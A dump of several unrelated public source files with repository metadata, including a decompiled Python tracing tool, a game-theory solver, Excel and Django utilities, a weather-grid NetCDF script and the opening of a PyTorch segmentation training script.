sys.stderr.write('%s: %s\n' % (sys.argv[0], msg))
sys.exit(1)
def main(argv = None):
    """Command-line entry point: parse trace.py options, then either render
    a report from a previous counts file or execute and trace the target
    script."""
    import getopt
    if argv is None:
        argv = sys.argv
    try:
        opts, prog_argv = getopt.getopt(argv[1:], 'tcrRf:d:msC:lTg', ['help',
         'version',
         'trace',
         'count',
         'report',
         'no-report',
         'summary',
         'file=',
         'missing',
         'ignore-module=',
         'ignore-dir=',
         'coverdir=',
         'listfuncs',
         'trackcalls',
         'timing'])
    except getopt.error as msg:
        sys.stderr.write('%s: %s\n' % (sys.argv[0], msg))
        sys.stderr.write("Try `%s --help' for more information\n" % sys.argv[0])
        sys.exit(1)

    # Option state, filled in by the loop below.
    trace = 0
    count = 0
    report = 0
    no_report = 0
    counts_file = None
    missing = 0
    ignore_modules = []
    ignore_dirs = []
    coverdir = None
    summary = 0
    listfuncs = False
    countcallers = False
    timing = False
    for opt, val in opts:
        if opt == '--help':
            usage(sys.stdout)
            sys.exit(0)
        if opt == '--version':
            sys.stdout.write('trace 2.0\n')
            sys.exit(0)
        if opt == '-T' or opt == '--trackcalls':
            countcallers = True
            continue
        if opt == '-l' or opt == '--listfuncs':
            listfuncs = True
            continue
        if opt == '-g' or opt == '--timing':
            timing = True
            continue
        if opt == '-t' or opt == '--trace':
            trace = 1
            continue
        if opt == '-c' or opt == '--count':
            count = 1
            continue
        if opt == '-r' or opt == '--report':
            report = 1
            continue
        if opt == '-R' or opt == '--no-report':
            no_report = 1
            continue
        if opt == '-f' or opt == '--file':
            counts_file = val
            continue
        if opt == '-m' or opt == '--missing':
            missing = 1
            continue
        if opt == '-C' or opt == '--coverdir':
            coverdir = val
            continue
        if opt == '-s' or opt == '--summary':
            summary = 1
            continue
        if opt == '--ignore-module':
            for mod in val.split(','):
                ignore_modules.append(mod.strip())

            continue
        if opt == '--ignore-dir':
            # Expand env vars plus the $prefix/$exec_prefix placeholders.
            for s in val.split(os.pathsep):
                s = os.path.expandvars(s)
                s = s.replace('$prefix', os.path.join(sys.prefix, 'lib', 'python' + sys.version[:3]))
                s = s.replace('$exec_prefix', os.path.join(sys.exec_prefix, 'lib', 'python' + sys.version[:3]))
                s = os.path.normpath(s)
                ignore_dirs.append(s)

            continue
        # NOTE(review): decompiler artifact - originally `assert 0, ...`;
        # this raises AssertionError unconditionally if reached.
        raise 0 or AssertionError('Should never get here')

    # Validate mutually-exclusive / required option combinations.
    if listfuncs and (count or trace):
        _err_exit('cannot specify both --listfuncs and (--trace or --count)')
    if not (count or trace or report or listfuncs or countcallers):
        _err_exit('must specify one of --trace, --count, --report, --listfuncs, or --trackcalls')
    if report and no_report:
        _err_exit('cannot specify both --report and --no-report')
    if report and not counts_file:
        _err_exit('--report requires a --file')
    if no_report and len(prog_argv) == 0:
        _err_exit('missing name of file to run')
    if report:
        # Report-only mode: just re-render a previously saved counts file.
        results = CoverageResults(infile=counts_file, outfile=counts_file)
        results.write_results(missing, summary=summary, coverdir=coverdir)
    else:
        # Execute mode: make the target script believe it was run directly.
        sys.argv = prog_argv
        progname = prog_argv[0]
        sys.path[0] = os.path.split(progname)[0]
        t = Trace(count, trace, countfuncs=listfuncs, countcallers=countcallers, ignoremods=ignore_modules, ignoredirs=ignore_dirs, infile=counts_file, outfile=counts_file, timing=timing)
        try:
            with open(progname) as fp:
                code = compile(fp.read(), progname, 'exec')
            globs = {'__file__': progname,
             '__name__': '__main__',
             '__package__': None,
             '__cached__': None}
            t.runctx(code, globs, globs)
        except IOError as err:
            _err_exit('Cannot run file %r because: %s' % (sys.argv[0], err))
        except SystemExit:
            pass

        results = t.results()
        if not no_report:
            results.write_results(missing, summary=summary, coverdir=coverdir)
    return
if __name__ == '__main__':
    main()  # command-line entry point
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\trace.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:28:28 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
c26fd50d1c7bcce85657403551fdc8dcd43b54cd | c3614e4bc024f4c0f619eaa05ce3f2e068d2e82d | /cutting_game.py | e4236f6016472df8e83d460246c1aa1bf42ee696 | [] | no_license | yukikawana/aoj | 68b2853b52975d4d066cd91b8cc6ee57c7c7d5c1 | cf53dc9957f02185e8b83b9c2ee28079ba88b2a5 | refs/heads/master | 2020-04-01T17:55:29.259738 | 2018-10-17T09:15:44 | 2018-10-17T09:15:44 | 153,459,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from utils import input_int
# Memo table for grundy(); keyed by (H, W).
mem = {}


def grundy(H, W):
    """Return the Sprague-Grundy number of an H x W board in the cutting game.

    A move cuts the board into two pieces, either horizontally (heights h and
    H-h with 2 <= h <= H-2) or vertically (widths w and W-w with
    2 <= w <= W-2); the position's value is the mex over the XORs of the two
    resulting sub-games. Results are memoized in the module-level `mem`.
    """
    key = (H, W)
    if key in mem:
        return mem[key]
    # Grundy values reachable in one move. Using a set makes the mex scan
    # below O(1) per membership test instead of O(n) on a list.
    reachable = set()
    for h in range(2, H - 1):
        reachable.add(grundy(h, W) ^ grundy(H - h, W))
    for w in range(2, W - 1):
        reachable.add(grundy(H, w) ^ grundy(H, W - w))
    mex = 0
    while mex in reachable:
        mex += 1
    mem[key] = mex
    return mex
def main():
    """Read the board dimensions and print which player wins the cutting game."""
    height = input_int("h = ")
    width = input_int("w = ")
    winner = "Alice wins" if grundy(height, width) else "Bob wins"
    print(winner)
if __name__ == "__main__":
    main()  # script entry point
| [
"kojirou.tensou@gmail.com"
] | kojirou.tensou@gmail.com |
e10e9064f3dc573fd39344ceefbdf8c3bcd548cf | b2b1e16968474ed573ebbebc1ee84bca59adbae1 | /ExcelParser/CountRows.py | f2759fce4c40fa1930aaef464718571aec7d2c72 | [] | no_license | shahpriyesh/PracticeCode | a03979d92a092bdbb5d0c7cfc1cfebc3f82e1c91 | 2afc3d0b3cd58d80ceb825a3ff0d190893e729fa | refs/heads/master | 2022-11-29T12:37:01.719792 | 2020-07-27T18:02:51 | 2020-07-27T18:02:51 | 257,656,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,139 | py | import xlrd
from openpyxl import *
def countEqualEntries(excel_file, sheet_name):
    """Tally duplicate rows in *sheet_name* of *excel_file*, keyed by column A.

    Returns {key: [count, question, difficulty, [companies...]]}. Difficulty
    is whichever of 'Easy'/'Medium' appears anywhere in the row ('Hard'
    otherwise); company names are collected from the second-to-last column
    when that cell holds a string.
    """
    wb = xlrd.open_workbook(excel_file)
    sheet = wb.sheet_by_name(sheet_name)
    counter = {}
    for i in range(1, sheet.nrows):  # start at 1 to skip the header row
        row = sheet.row_values(i)
        if row[0] in counter:
            counter[row[0]][0] += 1
            if isinstance(row[-2], str):
                counter[row[0]][3].append(row[-2])
        else:
            # List contains (Count, Question string, difficulty level, list of company names)
            # NOTE(review): `'Easy' in row` scans the whole row, not a fixed
            # difficulty column - assumes no other cell ever holds that text.
            if 'Easy' in row:
                counter[row[0]] = [1, row[1], 'Easy', []]
            elif 'Medium' in row:
                counter[row[0]] = [1, row[1], 'Medium', []]
            else:
                counter[row[0]] = [1, row[1], 'Hard', []]
            if isinstance(row[-2], str):
                counter[row[0]][3].append(row[-2])
    # xlrd cleanup: release mmap'd resources and drop the workbook reference.
    wb.release_resources()
    del wb
    return counter
def writeTotalEntries(excel_file, sheet_name, counter):
    """Write count/difficulty/companies (columns 9-11) onto the first row of
    each unique column-A key, using the data produced by countEqualEntries().

    NOTE(review): openpyxl rows are 1-based and max_row is inclusive, so
    `range(1, sheet.max_row)` appears to skip the last row - confirm intended.
    """
    wb = load_workbook(excel_file)
    sheet = wb[sheet_name]
    unique = set()
    for i in range(1, sheet.max_row):
        c1 = sheet.cell(row=i, column=1)
        c9 = sheet.cell(row=i, column=9)
        c10 = sheet.cell(row=i, column=10)
        c11 = sheet.cell(row=i, column=11)
        # writing values to cells
        if c1.value and c1.value not in unique:
            mapping = counter[c1.value]
            c9.value = mapping[0]
            c10.value = mapping[2]
            c11.value = ', '.join(mapping[3])
            unique.add(c1.value)
    wb.save(excel_file)
    wb.close()
def reformatEntries(excel_file, sheet_name):
    """Delete rows whose column-A value was already seen earlier in the sheet.

    NOTE(review): delete_rows() shifts all later rows up while `i` keeps
    advancing, so rows after a deletion get skipped; also `unique.add` runs
    before the dedup test has seen the first occurrence's later duplicates
    processed - this function looks buggy and is commented out at call site.
    """
    unique = set()
    wb = load_workbook(excel_file)
    sheet = wb[sheet_name]
    for i in range(1, sheet.max_row):
        c1 = sheet.cell(row=i, column=1)
        if c1.value in unique:
            sheet.delete_rows(i, 1)
        unique.add(c1.value)
    wb.save(excel_file)
    wb.close()
# Script entry: count duplicate questions in the workbook, then write the
# totals back into columns 9-11. (reformatEntries left disabled - see its note.)
filename = "/Users/pshah/Downloads/Leetcode_FAQ.xlsx"
sheetname = "FAQs"
counter = countEqualEntries(filename, sheetname)
writeTotalEntries(filename, sheetname, counter)
# reformatEntries(filename, sheetname)
"priyesh.shah@hitachivantara.com"
] | priyesh.shah@hitachivantara.com |
bbc0777dcd645f87565fccb02a0a3c22c08f6d20 | ae9fc81dd2a93a614c8e579b570ac3f4d2962392 | /Application/ReclamaCaicoProject/ReclamaCaicoApp/migrations/0001_initial.py | b020c4f1719f8084cc01a6631931c51963a8fdd4 | [
"MIT"
] | permissive | WesleyVitor/ReclamaCaico | c3743d40771a808c8238a93513ef54829413d314 | df67997821fc00236f1d9c77e8685ed8e4a6934b | refs/heads/master | 2022-12-10T21:43:23.615702 | 2020-09-17T17:18:34 | 2020-09-17T17:18:34 | 260,520,207 | 0 | 0 | MIT | 2020-09-17T17:18:35 | 2020-05-01T17:38:45 | Python | UTF-8 | Python | false | false | 1,912 | py | # Generated by Django 2.2.2 on 2019-09-02 11:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema: Login, Reclamacao and Comentario tables."""

    initial = True

    dependencies = [
        # Reclamacao.user is a FK to the project's (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Login',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(max_length=200)),
                ('password', models.CharField(max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Reclamacao',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('titulo', models.CharField(default='w', max_length=20)),
                ('nome', models.CharField(max_length=200)),
                ('bairro', models.CharField(max_length=200)),
                ('rua', models.CharField(max_length=200)),
                ('Ncasa', models.IntegerField()),
                ('foto', models.ImageField(default='w', upload_to='Reclama')),
                ('descricao', models.TextField(default='w', max_length=300)),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Comentario',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text1', models.TextField(max_length=1000)),
                # FK to the complaint this comment belongs to.
                ('idd', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ReclamaCaicoApp.Reclamacao')),
            ],
        ),
    ]
| [
"wesleydemorais@outlook.com.br"
] | wesleydemorais@outlook.com.br |
f3eaff00fba343a8a4a7f1ceb74a608f98fca37c | 99ba551645dc9beed36f0478b396977c50c3e7ef | /leetcode-vscode/438.找到字符串中所有字母异位词.py | da5c5fdcfc35c7bed066617bb31112a2426144bb | [] | no_license | wulinlw/leetcode_cn | 57381b35d128fb3dad027208935d3de3391abfd0 | b0f498ebe84e46b7e17e94759dd462891dcc8f85 | refs/heads/master | 2021-08-09T17:26:45.688513 | 2021-07-15T14:38:30 | 2021-07-15T14:38:30 | 134,419,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,625 | py | #
# @lc app=leetcode.cn id=438 lang=python3
#
# [438] 找到字符串中所有字母异位词
#
# https://leetcode-cn.com/problems/find-all-anagrams-in-a-string/description/
#
# algorithms
# Medium (41.20%)
# Likes: 247
# Dislikes: 0
# Total Accepted: 21.8K
# Total Submissions: 51.4K
# Testcase Example: '"cbaebabacd"\n"abc"'
#
# 给定一个字符串 s 和一个非空字符串 p,找到 s 中所有是 p 的字母异位词的子串,返回这些子串的起始索引。
#
# 字符串只包含小写英文字母,并且字符串 s 和 p 的长度都不超过 20100。
#
# 说明:
#
#
# 字母异位词指字母相同,但排列不同的字符串。
# 不考虑答案输出的顺序。
#
#
# 示例 1:
#
#
# 输入:
# s: "cbaebabacd" p: "abc"
#
# 输出:
# [0, 6]
#
# 解释:
# 起始索引等于 0 的子串是 "cba", 它是 "abc" 的字母异位词。
# 起始索引等于 6 的子串是 "bac", 它是 "abc" 的字母异位词。
#
#
# 示例 2:
#
#
# 输入:
# s: "abab" p: "ab"
#
# 输出:
# [0, 1, 2]
#
# 解释:
# 起始索引等于 0 的子串是 "ab", 它是 "ab" 的字母异位词。
# 起始索引等于 1 的子串是 "ba", 它是 "ab" 的字母异位词。
# 起始索引等于 2 的子串是 "ab", 它是 "ab" 的字母异位词。
#
#
#
from typing import List
# @lc code=start
class Solution:
    def findAnagrams(self, s: str, p: str) -> List[int]:
        """Return the start indices of every anagram of p inside s.

        Maintains a sliding window of at most len(p) characters as a
        frequency dict and records each position where it matches p's
        frequency table. O(len(s) * alphabet) overall.
        """
        target = {}
        for ch in p:
            target[ch] = target.get(ch, 0) + 1
        window = {}
        hits = []
        lo = 0
        for hi, ch in enumerate(s):
            window[ch] = window.get(ch, 0) + 1
            if hi == lo + len(p):
                # Window grew one past len(p): evict the leftmost character.
                left_ch = s[lo]
                if window[left_ch] == 1:
                    del window[left_ch]
                else:
                    window[left_ch] -= 1
                lo += 1
            if window == target:
                hits.append(lo)
        return hits
return re
# @lc code=end
s = "cbaebabacd"
p = "abc"
# s = "abab"
# p = "ab"
# s = "baa"
# p = "aa"
o = Solution()
print(o.findAnagrams(s, p)) | [
"wulinlw@gmail.com"
] | wulinlw@gmail.com |
8cda640d958088ed52e602287e97730545bd2a62 | a99a44aee5cfc5e080f6d83d2bcc1c3d273a3426 | /scripts/iemre/init_hourly.py | 4876319dfe3c2b9cd95b3aa45e88caad6deaf8c6 | [
"MIT"
] | permissive | ragesah/iem | 1513929c8bc7f254048271d61b4c4cf27a5731d7 | 8ed970d426bddeaa3e7ded593665d22f0f9f6e87 | refs/heads/main | 2023-08-20T20:01:15.480833 | 2021-10-12T15:44:52 | 2021-10-12T15:44:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,467 | py | """Generate the IEMRE hourly analysis file for a year"""
import datetime
import sys
import os
import geopandas as gpd
import numpy as np
from pyiem import iemre
from pyiem.grid.zs import CachingZonalStats
from pyiem.util import get_dbconn, ncopen, logger
LOG = logger()
def init_year(ts):
    """
    Create a new hourly IEMRE NetCDF file for the year containing `ts`.

    Args:
      ts (datetime.datetime): any timestamp within the target year
        (only ``ts.year`` is used).

    The file is laid out on the 0.125 degree IEMRE grid with one time
    step per hour for the whole year.  An existing file is never
    overwritten.
    """
    fn = iemre.get_hourly_ncname(ts.year)
    if os.path.isfile(fn):
        LOG.info("Cowardly refusing to overwrite: %s", fn)
        return
    nc = ncopen(fn, "w")
    # Global metadata attributes
    nc.title = "IEM Hourly Reanalysis %s" % (ts.year,)
    nc.platform = "Grided Observations"
    nc.description = "IEM hourly analysis on a 0.125 degree grid"
    nc.institution = "Iowa State University, Ames, IA, USA"
    nc.source = "Iowa Environmental Mesonet"
    nc.project_id = "IEM"
    nc.realization = 1
    nc.Conventions = "CF-1.0"
    nc.contact = "Daryl Herzmann, akrherz@iastate.edu, 515-294-5978"
    nc.history = ("%s Generated") % (
        datetime.datetime.now().strftime("%d %B %Y"),
    )
    nc.comment = "No Comment at this time"
    # Setup Dimensions
    nc.createDimension("lat", iemre.NY)
    nc.createDimension("lon", iemre.NX)
    ts2 = datetime.datetime(ts.year + 1, 1, 1)
    # Anchor on 1 Jan so any `ts` within the year yields the full year
    # length (365 or 366 days), not just a Jan-1 `ts`.
    ts1 = datetime.datetime(ts.year, 1, 1)
    days = (ts2 - ts1).days
    LOG.info("Year %s has %s days", ts.year, days)
    nc.createDimension("time", int(days) * 24)

    # Setup Coordinate Variables
    lat = nc.createVariable("lat", float, ("lat",))
    lat.units = "degrees_north"
    lat.long_name = "Latitude"
    lat.standard_name = "latitude"
    lat.axis = "Y"
    lat[:] = iemre.YAXIS

    lon = nc.createVariable("lon", float, ("lon",))
    lon.units = "degrees_east"
    lon.long_name = "Longitude"
    lon.standard_name = "longitude"
    lon.axis = "X"
    lon[:] = iemre.XAXIS

    tm = nc.createVariable("time", float, ("time",))
    tm.units = "Hours since %s-01-01 00:00:0.0" % (ts.year,)
    tm.long_name = "Time"
    tm.standard_name = "time"
    tm.axis = "T"
    tm.calendar = "gregorian"
    tm[:] = np.arange(0, int(days) * 24)

    # Tracked variables
    hasdata = nc.createVariable("hasdata", np.int8, ("lat", "lon"))
    hasdata.units = "1"
    hasdata.long_name = "Analysis Available for Grid Cell"
    hasdata.coordinates = "lon lat"
    hasdata[:] = 0

    # int8 can store -128->127; actual values are 0 to 100
    skyc = nc.createVariable(
        "skyc", np.int8, ("time", "lat", "lon"), fill_value=-128
    )
    skyc.long_name = "ASOS Sky Coverage"
    # fixed: was misspelled "stanard_name" (CF expects "standard_name")
    skyc.standard_name = "ASOS Sky Coverage"
    skyc.units = "%"
    skyc.valid_range = [0, 100]
    skyc.coordinates = "lon lat"

    # uint16 0->65535 maps to 0 to 655.35 K via the 0.01 scale factor
    tmpk = nc.createVariable(
        "tmpk", np.uint16, ("time", "lat", "lon"), fill_value=65535
    )
    tmpk.units = "K"
    tmpk.scale_factor = 0.01
    tmpk.long_name = "2m Air Temperature"
    tmpk.standard_name = "2m Air Temperature"
    tmpk.coordinates = "lon lat"

    # uint16 0->65535 maps to 0 to 655.35 K via the 0.01 scale factor
    # fixed: fill_value was 65335 (digit transposition); every other
    # uint16 variable in this file uses the max value 65535
    dwpk = nc.createVariable(
        "dwpk", np.uint16, ("time", "lat", "lon"), fill_value=65535
    )
    dwpk.units = "K"
    dwpk.scale_factor = 0.01
    dwpk.long_name = "2m Air Dew Point Temperature"
    dwpk.standard_name = "2m Air Dew Point Temperature"
    dwpk.coordinates = "lon lat"

    # NOTE: we need to store negative numbers here, gasp
    # -32768 to 32767 maps to -65.5 to 65.5 mps via the 0.002 scale factor
    uwnd = nc.createVariable(
        "uwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
    )
    uwnd.scale_factor = 0.002
    uwnd.units = "meters per second"
    uwnd.long_name = "U component of the wind"
    uwnd.standard_name = "U component of the wind"
    uwnd.coordinates = "lon lat"

    # NOTE: we need to store negative numbers here, gasp
    # -32768 to 32767 maps to -65.5 to 65.5 mps via the 0.002 scale factor
    vwnd = nc.createVariable(
        "vwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
    )
    vwnd.scale_factor = 0.002
    vwnd.units = "meters per second"
    vwnd.long_name = "V component of the wind"
    vwnd.standard_name = "V component of the wind"
    vwnd.coordinates = "lon lat"

    # uint16 0->65535 maps to 0 to 655.35 mm via the 0.01 scale factor
    p01m = nc.createVariable(
        "p01m", np.uint16, ("time", "lat", "lon"), fill_value=65535
    )
    p01m.units = "mm"
    p01m.scale_factor = 0.01
    p01m.long_name = "Precipitation"
    p01m.standard_name = "Precipitation"
    p01m.coordinates = "lon lat"
    p01m.description = "Precipitation accumulation for the hour valid time"

    nc.close()
def compute_hasdata(year):
    """Flag every grid cell covered by a US state in the hasdata variable.

    Opens the year's hourly file in append mode, runs cached zonal stats
    of the state polygons over the grid, and sets hasdata=1 wherever a
    state covers the cell.
    """
    nc = ncopen(iemre.get_hourly_ncname(year), "a", timeout=300)
    zstats = CachingZonalStats(iemre.AFFINE)
    dbconn = get_dbconn("postgis")
    statesdf = gpd.GeoDataFrame.from_postgis(
        "SELECT the_geom, state_abbr from states",
        dbconn,
        index_col="state_abbr",
        geom_col="the_geom",
    )
    # Work north-up: the affine used by the zonal stats expects the grid
    # flipped relative to the netCDF storage order.
    hasdata = np.flipud(nc.variables["hasdata"][:, :])
    zstats.gen_stats(hasdata, statesdf["the_geom"])
    for nav in zstats.gridnav:
        if nav is None:
            continue
        # 1 inside the polygon, 0 where the nav mask excludes the cell.
        inside = np.ones((nav.ysz, nav.xsz))
        inside[nav.mask] = 0.0
        rows = slice(nav.y0, nav.y0 + nav.ysz)
        cols = slice(nav.x0, nav.x0 + nav.xsz)
        hasdata[rows, cols] = np.where(inside > 0, 1, hasdata[rows, cols])
    nc.variables["hasdata"][:, :] = np.flipud(hasdata)
    nc.close()
def main(argv):
    """Build and populate the hourly analysis file for one year.

    ``argv[1]`` must be the four-digit year to initialize.
    """
    yr = int(argv[1])
    jan1 = datetime.datetime(yr, 1, 1)
    init_year(jan1)
    compute_hasdata(yr)


if __name__ == "__main__":
    main(sys.argv)
| [
"akrherz@iastate.edu"
] | akrherz@iastate.edu |
805e26a503b1e54e65411035aebfd19197d9f38b | 9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56 | /google/ads/googleads/v9/enums/types/ad_group_criterion_approval_status.py | 76072e9401b3ddc6e578d95c993b65b3da5a7ca1 | [
"Apache-2.0"
] | permissive | GerhardusM/google-ads-python | 73b275a06e5401e6b951a6cd99af98c247e34aa3 | 676ac5fcb5bec0d9b5897f4c950049dac5647555 | refs/heads/master | 2022-07-06T19:05:50.932553 | 2022-06-17T20:41:17 | 2022-06-17T20:41:17 | 207,535,443 | 0 | 0 | Apache-2.0 | 2019-09-10T10:58:55 | 2019-09-10T10:58:55 | null | UTF-8 | Python | false | false | 1,262 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v9.enums",
marshal="google.ads.googleads.v9",
manifest={"AdGroupCriterionApprovalStatusEnum",},
)
class AdGroupCriterionApprovalStatusEnum(proto.Message):
    r"""Container for enum describing possible AdGroupCriterion
    approval statuses.

    NOTE(review): this module is generated (proto-plus wrapper); edits
    here are normally overwritten on regeneration.
    """

    class AdGroupCriterionApprovalStatus(proto.Enum):
        r"""Enumerates AdGroupCriterion approval statuses."""
        UNSPECIFIED = 0  # Not specified.
        UNKNOWN = 1  # Value unknown in this API version.
        APPROVED = 2  # Criterion is approved.
        DISAPPROVED = 3  # Criterion is disapproved.
        PENDING_REVIEW = 4  # Criterion is awaiting review.
        UNDER_REVIEW = 5  # Criterion is currently under review.
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | GerhardusM.noreply@github.com |
e6c20e95b44435203bda1ee5f8f97dcf0b45d0bb | affdb1186825486d40c1140314cc04fe63b153b7 | /_old/tgs-salt-identification-challenge/single_models.py | 0b9213b95b7f44783979bdccf19a605f666c740d | [] | no_license | Yagami360/kaggle_exercises | 2f9a8a12c48a6e55ded6c626ceef5fb0cfca935b | 17b731bb6f1ce0b81254047ffc56371f4c485df0 | refs/heads/master | 2022-11-22T23:00:27.176123 | 2020-07-23T05:05:00 | 2020-07-23T05:05:00 | 252,343,652 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,479 | py | import os
import argparse
import numpy as np
import pandas as pd
import random
from tqdm import tqdm
import warnings
import json
import yaml
from matplotlib import pyplot as plt
import seaborn as sns
from PIL import Image
import cv2
#from skimage.transform import resize
from kaggle.api.kaggle_api_extended import KaggleApi
# sklearn
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
# PyTorch
import torch
from torch.utils.data import TensorDataset, DataLoader
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from torchvision.utils import save_image
from tensorboardX import SummaryWriter
# 自作モジュール
from dataset import load_dataset, TGSSaltDataset, TGSSaltDataLoader
from models import UNet4, UNet4BottleNeck, GANimationGenerator, MGVTONResGenerator
from models import PatchGANDiscriminator, MultiscaleDiscriminator, GANimationDiscriminator
from models import ParsingCrossEntropyLoss, VGGLoss, VanillaGANLoss, LSGANLoss, HingeGANLoss, ConditionalExpressionLoss
from utils import save_checkpoint, load_checkpoint, convert_rle
from utils import board_add_image, board_add_images, save_image_w_norm
from utils import iou_metric, iou_metric_batch
if __name__ == '__main__':
    # Command-line options (help strings are Japanese in the original UI
    # and are left as-is because they are runtime strings).
    parser = argparse.ArgumentParser()
    parser.add_argument("--exper_name", default="single_model_pytorch", help="実験名")
    parser.add_argument("--dataset_dir", type=str, default="../datasets/competition_data")
    parser.add_argument("--results_dir", type=str, default="results")
    parser.add_argument("--submit_file", type=str, default="submission.csv")
    parser.add_argument("--competition_id", type=str, default="tgs-salt-identification-challenge")
    parser.add_argument("--train_mode", choices=["train", "test", "eval"], default="train", help="")
    parser.add_argument("--model_type_G", choices=["unet4", "unet5", "unet4bottleneck", "mgvton", "ganimation"], default="unet4", help="生成器モデルの種類")
    parser.add_argument("--model_type_D", choices=["patchgan", "multiscale", "ganimation"], default="patchgan", help="識別器モデルの種類")
    parser.add_argument('--save_checkpoints_dir', type=str, default="checkpoints", help="モデルの保存ディレクトリ")
    parser.add_argument('--load_checkpoints_path_G', type=str, default="", help="生成器モデルの読み込みファイルのパス")
    parser.add_argument('--load_checkpoints_path_D', type=str, default="", help="識別器モデルの読み込みファイルのパス")
    parser.add_argument('--tensorboard_dir', type=str, default="tensorboard", help="TensorBoard のディレクトリ")
    parser.add_argument("--n_epoches", type=int, default=200, help="エポック数")
    parser.add_argument('--batch_size', type=int, default=32, help="バッチサイズ")
    parser.add_argument('--batch_size_test', type=int, default=1, help="バッチサイズ")
    parser.add_argument('--lr', type=float, default=0.001, help="学習率")
    parser.add_argument('--beta1', type=float, default=0.5, help="学習率の減衰率")
    parser.add_argument('--beta2', type=float, default=0.999, help="学習率の減衰率")
    parser.add_argument('--image_height_org', type=int, default=101, help="入力画像の高さ(pixel単位)")
    parser.add_argument('--image_width_org', type=int, default=101, help="入力画像の幅(pixel単位)")
    parser.add_argument('--image_height', type=int, default=128, help="入力画像の高さ(pixel単位)")
    parser.add_argument('--image_width', type=int, default=128, help="入力画像の幅(pixel単位)")
    parser.add_argument("--n_channels", type=int, default=1, help="チャンネル数")
    parser.add_argument("--n_samplings", type=int, default=100000, help="ラベル数")
    parser.add_argument('--data_augument', action='store_true')
    parser.add_argument('--depth', action='store_true')
    parser.add_argument("--val_rate", type=float, default=0.20)
    parser.add_argument('--lambda_bce', type=float, default=1.0, help="クロスエントロピー損失関数の係数値")
    parser.add_argument('--lambda_enpropy', type=float, default=1.0, help="クロスエントロピー損失関数の係数値")
    parser.add_argument('--lambda_l1', type=float, default=0.0, help="L1損失関数の係数値")
    parser.add_argument('--lambda_vgg', type=float, default=0.0, help="VGG perceptual loss_G の係数値")
    parser.add_argument('--lambda_adv', type=float, default=1.0, help="Adv loss_G の係数値")
    parser.add_argument('--adv_loss_type', choices=['vanilla', 'lsgan', 'hinge'], default="lsgan", help="GAN Adv loss の種類")
    parser.add_argument('--lambda_cond', type=float, default=1000.0, help="conditional expression loss の係数値")
    parser.add_argument("--n_diaplay_step", type=int, default=100,)
    parser.add_argument("--n_save_epoches", type=int, default=50,)
    parser.add_argument("--seed", type=int, default=71)
    parser.add_argument('--device', choices=['cpu', 'gpu'], default="gpu", help="使用デバイス (CPU or GPU)")
    parser.add_argument('--n_workers', type=int, default=4, help="CPUの並列化数(0 で並列化なし)")
    parser.add_argument('--use_cuda_benchmark', action='store_true', help="torch.backends.cudnn.benchmark の使用有効化")
    parser.add_argument('--use_cuda_deterministic', action='store_true', help="再現性確保のために cuDNN に決定論的振る舞い有効化")
    parser.add_argument('--submit', action='store_true')
    parser.add_argument('--debug', action='store_true')
    args = parser.parse_args()
    # These model variants require the depth channel as an extra input.
    if( args.model_type_G == "unet4bottleneck" ):
        args.depth = True
    if( args.model_type_D == "ganimation" ):
        args.depth = True
    # Automatically derive the experiment name from the hyperparameters
    # when the default name was not overridden on the command line.
    if( args.exper_name == "single_model_pytorch" ):
        if( args.train_mode in ["test", "eval"] ):
            args.exper_name = "test_" + args.exper_name
        args.exper_name += "_" + args.model_type_G
        if( args.data_augument ):
            args.exper_name += "_da"
        if( args.depth ):
            args.exper_name += "_depth"
        args.exper_name += "_ep" + str(args.n_epoches)
        args.exper_name += "_b" + str(args.batch_size)
        args.exper_name += "_lr{}".format(args.lr)
        args.exper_name += "_bce{}".format(args.lambda_bce)
        args.exper_name += "_enpropy{}".format(args.lambda_enpropy)
        args.exper_name += "_l1{}".format(args.lambda_l1)
        args.exper_name += "_vgg{}".format(args.lambda_vgg)
        args.exper_name += "_adv{}_{}".format(args.adv_loss_type, args.lambda_adv)
        if( args.model_type_D == "ganimation" ):
            args.exper_name += "_cond{}".format(args.lambda_cond)
    if( args.debug ):
        for key, value in vars(args).items():
            print('%s: %s' % (str(key), str(value)))
    # Create the results / checkpoint directory layout.
    if not os.path.isdir(args.results_dir):
        os.mkdir(args.results_dir)
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name) ):
